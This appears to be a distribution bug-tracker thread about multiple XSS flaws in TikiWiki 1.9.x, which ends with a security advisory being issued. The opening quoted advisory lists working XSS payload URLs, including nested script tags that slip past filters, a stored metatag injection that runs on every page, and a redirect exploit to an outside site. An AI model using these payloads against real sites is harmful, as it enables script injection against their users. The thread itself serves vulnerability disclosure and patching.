Multiple XSS Vulnerabilities in Tikiwiki 1.9.x Discovered by Blwood http://www.blwood.net ** Public ** ------------- Tiki-lastchanges http://www.site.com/tiki-lastchanges.php?days=3&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E http://www.site.com/tikiwiki-1.9.3.1/tiki-lastchanges.php?days=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=0&sort_mode=user_desc ------------- Tiki-orphan_pages.php http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=&sort_mode=flag_desc http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=&offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=flag_desc ------------- Tiki-listpages.php http://www.site.com/tiki-listpages.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=creator_desc http://www.site.com/tiki-listpages.php?initial=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=pageName_asc ------------- Tiki-remind_password.php http://tikiwiki.org/tiki-remind_password.php "><scr<script>ipt>alert('Blwood')</scr</script>ipt> ------------- ** Admin ** ------------- Tiki-admin_include_metatags.php http://www.site.com/tiki-admin.php?page=metatags "><sc<script>ript>alert('Blwood')</scr</script>ipt> In all pages the source will be : <meta name="keywords" content=""><script>alert('Blwood')</script>" /> The code will be executed in every pages ! Exploit : "><sc<script>ript>document.location='http://www.blwood.net'</scr</script>ipt> ------------- (...) (i don't paste all code)
Hi, Hrm ... none of those links work at all :( I'll have to get tikiwiki setup locally to try and reproduce this problem. I'll also have a poke around UPSTREAM's cvs repos to see if they've added any unreleased fixes. Best regards, Stu
Thanks Stuart; assigning to "Auditing" then, in order to know if we are vulnerable or not.
*** Bug 136108 has been marked as a duplicate of this bug. ***
Handling the tikiwiki issue on this bug. 1.9.3.2 is out now.
adding CVE ref
in CVS
ppc please test and mark stable.
ppc stable. old vulnerable ebuild removed.
I tend to vote NO.
We had already issue GLSA 200510-23 concerning a TikiWiki XSS. Should we follow the history or change it ?
I usually tend to vote yes for XSS in wikis... but only if you can actually post things with active code in it, not just follow lame links. So I vote NO.
In my understanding you can inject arbitrary JavaScript. If that is true I vote YES.
Voting No and closing. Feel free to reopen if you disagree. Furthermore, another security update (1.9.3.4) has just been issued, see bug 136723, which is probably a little bit more serious (SQL injection and XSS).
Reopening to be included with bug #136723.
GLSA 200606-29
